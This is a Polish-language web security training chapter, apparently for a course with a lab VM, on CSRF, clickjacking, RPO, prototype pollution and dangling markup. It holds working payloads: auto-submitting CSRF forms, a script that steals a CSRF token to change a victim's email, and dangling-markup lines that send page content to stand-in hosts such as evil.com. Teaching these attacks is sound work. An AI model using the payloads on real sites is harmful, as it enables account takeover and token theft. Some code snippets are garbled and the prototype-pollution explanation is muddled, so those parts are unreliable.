# Inne ataki po stronie klienta

## Cross-Site Request Forgery
#### Cross-Site Request Forgery - Definicja
CSRF - atak tego typu polega na przesyłaniu żądania w imieniu atakowanego użytkownika. O CSRF wspomniałem wcześniej w przypadku ataku XSS w POST. Oba ataki w tej kwestii są dosyć podobne, aż do czasu wysłania żądania. W przypadku XSS na stronę wysyłany jest złośliwy ładunek javascriptu, a w przypadku CSRF przesyłane są złośliwe dane np. formularz zmiany hasła.

#### CSRF - Ataki
Ataki CSRF najczęściej występują w formie ataku na adres URL, albo formularz. W każdym wypadku wymagana jest interakcja ze strony ofiary. W przypadku URL wystarczy, że ofiara kliknie złośliwy link, który może np. dodać użytkownika. W przypadku formularza, należy nakłonić ofiarę do otworzenia strony z fałszywym formularzem oraz prawdziwej strony z prawdziwym formularzem.
Cross-Site Request Forgery nie cieszy się sporym zainteresowaniem pomimo tego, że może stwarzać nawet większe zagrożenie niż XSS. W praktyce dużo stron jest podatnych na tego typu atak.

#### XSRF (CSRF) - Przykład
To przykładowy kod, który może zostać wysłany za użytkownika w celach ataku. Dzięki niemu atakujący może zmienić email do konta ofiary na swój i uzyskać dostęp do wszystkich danych konta.

```html
<html>
  <body>
	<form action/=/"https://vulnerable-website.com/email/change" method="POST">
  	<input type="hidden" name="email" value="evil@email.com" />
	</form>
	<script>
  	document.forms[0].submit();
	</script>
  </body>
</html> 
```

#### XSS + CSRF
Jedną z technik obrony przed atakami typu CSRF czasami nazywanymi XSRF, jest generowanie z każdym formularzem nowego tokena. W ten sposób, żeby atakujący mógł przesłać formularz potrzebuje przesłać również token, który jest losowy. Są jednak przypadki kiedy podatność XSS i CSRF występują razem. Dzięki temu atakujący może pobrać przy pomocy ataku XSS token CSRF i przeprowadzić skuteczny atak XSRF.

```html
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get'//,'/my-account',true);
req.send();
function handleResponse() {
	var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
	var changeReq = new XMLHttpRequest();
	changeReq.open('post', '/my-account/change-email', true);
	changeReq.send('csrf='+token+'&email=test@test.com')
};
</script> 
```
W tym przypadku podatność XSS występuje w endpointcie /my-account. Dzięki tej podatności atakujący może odczytać losowy token CSRF, dokleić go do spreparowanego formularza i wysłać go w imieniu ofiary.

#### CSRF - ćwiczenie
Wejdź pod adres
http://vuln.vms.perkmylife.com:8080/mutillidae/index.php?page=add-to-your-blog.php
c
Spróbuj dodać wpis na blogu, a nastepnie naciśnij kombinacje Ctrl+Shift+I i wybierz zakładkę Network. Teraz spróbuj dodać kolejny wpis. Powinieneś zobaczyć zakładkę Network, a w niej index.php?page=add-to-your-blog.php.
Klinj w nią zobacz, że jest to strona, pod którą wysyła się formularz z trzema parametrami:
```sh
csrf-token: 
blog_entry: asdasd
add-to-your-blog-php-submit-button: Save Blog Entry
```
Mając tą wiedzę możemy spróbować stworzyć prosty formularz wysyłający się kiedy użytkownik kliknie w nasz link:
//src/vuln/csrf-exploit.php
```html
<html>
    <center>
    <body><h1>Some stuff</h1>
        <form name="csrf" action="http://vuln.vms.perkmylife.com:8080/mutillidae/index.php?page=add-to-your-blog.php"
        method="POST">
        <input type="hidden" name='csrf-token' value=''>
        <input type="hidden" name='blog_entry' value='This entry was hacked!'>
        <input type="hidden" name='add-to-your-blog-php-submit-button' value='Save Blog Entry'>
    </form>
    <script>document.csrf.submit();</script>
    </center></body>
</html>
```
Jak widać, na początku strona pokazuje nagłówek "Some stuff" dodany dla zmylenie, żeby ofiara nie podejrzewała, że coś się dzieje po otworzeniu pustej strony. W atrybucie action
jest przekierowanie na stronę z formularzem. Następnie wszystkie wartości są wypełnanie tak jak w zwykłym formularzu oprócz "This entry was hacked!" - to miejsce gdzie wyysyłamy szkodliwe dane.
Jeżeli mamy taki plik na serwerze możemy wysłać go użytkownikowi. Jeżeli kliknie w niego  mając otwartą sesję na stronie to dodamy wpis w jego imieniu.
W celatch testów można skorzystać z tego adresu, żeby wysłać szkodliwy kod:
```sh
http://vuln.vms.perkmylife.com/csrf-exploit.php
```
Zauważ, że exploit był na zupełnie innym porcie, a pomimo to wpis się dodał.
## Clickjacking

#### Clickjacking - Definicja
Atak typu Clickjacking jest bardzo podobny do CSRF, ale wymaga większej interakcji ze strony użytkownika. Nie dość, że trzeba mieć otwartą kartę z fałszywą i prawdziwą stroną to użytkownik musi kliknąć w specjalny przycisk stąd nazwa podatności. Clickjacking oszukuje użytkownika, że klikając w obiekt witryny realizuje działania na tej samej witrynie. W rzeczywistości obiekt, który klika nie należy do witryny.

```html
<head>
	<style>
		#strona_docelowa {
			position:relative;
			width:128px;
			height:128px;
			opacity:0.00001;
			z-index:2;
		}
		#strona_pulapka {
			position:absolute;
			width:300px;
			height:400px;
			z-index:1;
		}
	</style>
</head>
...
<body>
	<div id="strona_pulapka">
		...decoy web content here...
	</div>
	<iframe id="strona_docelowa" src="https://vuln.website.com">
	</iframe>
</body>
```
> @todo please make an exercise page/endpoint for this under /src and on the vuln VM and also make in more real. For instance you can change the same page like in CSRF exercise, but this time, by clicking some button, or going mouseover some DOM element

#### Clickjacking - Ćwiczenie
Wejdź w zakładkę OWASP-2017, następnie A3, potem Information-Disclosure i Clickjacking.
http://vuln.vms.perkmylife.com:8080/mutillidae/index.php?page=framing.php
Pobaw się chwilę, żeby zaznajomić się z atakiem
> @todo Please write some short instruction on how to play with it. Inspect, what to look at, what js/DOM elements to focus on for this Clickjacking to actually be a tricky hack. Try to change CSS so that the actual clickbox is transparent. Also explain, that you can XSS such a clickjacking element. Is it possible a vulnerability if you can achieve the same effect by running ads on someones website?


## RPO (Relative Path Overwrite) CSS
Relative Path Override CSS polega na załadowaniu złośliwych danych wykorzystując często podawane przez programistów ścieżki względne do plików CSS. Pliki wczytywane jako arkusze stylów nie ładują domyślnie kodu tj. nie można na nim wykonać kodu backendowego. Ta funkcjonalność z pozoru mało istotna istotna daje znakomite rezultaty i otwiera nowe ścieżki ataku. 

W przykładowym ataku zamiast arkusza stylu można włączyć plik aspx, którego kod źródłowu powinien zostać niewidoczny. Ze względu na to, że ładowany jest jako arkusz stylu, kod nie jest interpretowany, a wyświetlany jako normalny tekst. Takie zachowanie może pomóc w ujawnieniu bardzo wrażliwych informacji, a czasami nawet umożliwić RCE. 

```html↓Doc base:/demo/RPO/anotherpage.css.aspx/%2f..%2f..%2f..%2fdemo/RPO/CSS path:/demo/RPO/anotherpage.css.aspx/%2f..%2f..%2f..%2fdemo/RPO/../../style.css/demo/RPO/anotherpage.css.aspx/style.cs ```
> @todo what's that?? Elaborate on it, make a simple exercise. Create a sample .aspx or .php file under src and on the machine and show that you can actually view the files content in Browser's sources tab. Also explain via what tags you can carry out this attack. Note, that in the slides there's a bit different code.


## JSON Hijacking
Najlepszym przykładem tego typu błędu jest osławione prototype pollution z wysyłanymi danymi w formacie JSON (sama podatność nie jest związana z json hijacking, ale często występuje z formatami JSON i służy jako świetny przykład tego typu ataku).
Użytkownik może przeskakiwać do różnych obiektów korzystając z funkcjonalności Javascriptu w taki sposób, że może zmodyfikować dane np. w formacie JSON i wysłać szkodliwy ładunek. Czasami taki błąd prowadzi nawet do Remote Code Execution czyli zdalnego wykonywania komend na serwerze.

Złośliwy użytkownik może skorzystać z tzw. `__proto__`, czyli odwołania się do klasy nadrzędnej.
Na potrzeby przykładu załóżmy, że jest aplikacja, która ma trzy klasy: klasa All - nadrzędna, klasa Users i Admin, które są równoległe. Użytkownik wysyła informacje do klasy Users i nie ma dostępu do klasy Admin, ale czy na pewno?
Załóżmy pole formularza w klasie Users - "user" i pole formularza w klasie Admin - "admin"
Użytkownik przesyła następujące informacje w formacie JSON:
```json
{"user":"guest"}
```
Atakujący może spróbować skoczyć do wyższej klasy używając __proto__ i próbować wpłynąć na inne klasy w klasie All. Może nawet próbować wyskoczyć poza klasę All.
```json
{"user.__proto__.Admin.admin": "true"}
```

Kod mówi: "Wyskocz z klasy User, skorzystaj z klasy Admin, a konkretniej z parametru admin i ustaw go na wartość true".
Po udanym ataku ustawiliśmy użytkownika "guest" jako admin.
> @todo maybe some url to a proof of concept working example?

## Dangling-markup
Dangling markup injection jest rzadko spotykanym atakiem, który wykorzystuje się najczęściej jako atak wspomagający takie ataki jak XSS i CSRF.
Jeżeli aplikacja skutecznie broni się przed XSS np. w formie dobrej polityki CSP być może jest możliwość wykonania wstrzyknięcia w trochę inny sposób. W celu wytłumaczenia ataku, postaram się go wyjaśnić na przykładzie.

Poniżej przykład ataku:
```html
<form action='http://evil.com/log.cgi'>
 <textarea> ← Injected line …
 <input type="hidden" name="xsrf_token" value="12345">
  ... 
</form>
```
W linicje injected line można spróbować wstrzyknąć następującą składnię:
```html
<img src="https://attacker.server.com?
```
Przeglądarka pomyślnie odczyta tag img oraz atrybut src, który posiada pewien problem, ponieważ nie ma cudzysłowu kończącego. W związku z tym przeglądarka będzie czytać kod strony dopóki nie natrafi na cudzysłów lub strona się nie skończony. Następnie wyślę cały kod na serwer atakującego. Oczywiście wśród tego kodu jest csrf token, który jest niezbędny do ataku.

Więcej informacji o tym oraz o innych atakach Client-side można znaleźć na świetnej stronie twórców Burpa, czyli PortSwigger
https://portswigger.net/web-security/cross-site-scripting/dangling-markup
